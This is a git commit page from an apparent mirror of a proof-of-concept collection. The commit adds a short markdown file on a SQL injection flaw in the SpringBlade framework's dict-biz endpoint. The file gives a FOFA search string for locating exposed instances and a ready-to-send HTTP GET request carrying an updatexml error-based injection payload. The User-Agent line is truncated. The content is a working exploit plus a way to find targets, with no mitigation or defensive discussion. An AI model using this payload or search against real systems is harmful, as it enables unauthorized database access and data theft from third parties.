mirror of
https://github.com/wy876/POC.git
synced 2025-02-27 04:39:25 +00:00
Create SpringBlade框架dict-biz接口存在sql注入漏洞.md
This commit is contained in:
parent
4620c2b685
commit
b245028738
14
SpringBlade框架dict-biz接口存在sql注入漏洞.md
Normal file
14
SpringBlade框架dict-biz接口存在sql注入漏洞.md
Normal file
@ -0,0 +1,14 @@
|
|||||||
|
## SpringBlade框架dict-biz接口存在sql注入漏洞
|
||||||
|
|
||||||
|
|
||||||
|
## fofa
|
||||||
|
```
|
||||||
|
body="Saber 将不能正常工作"
|
||||||
|
```
|
||||||
|
|
||||||
|
## poc
|
||||||
|
```
|
||||||
|
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
|
||||||
|
Host: your-ip
|
||||||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win
|
||||||
|
```
|
||||||
Loading…
x
Reference in New Issue
Block a user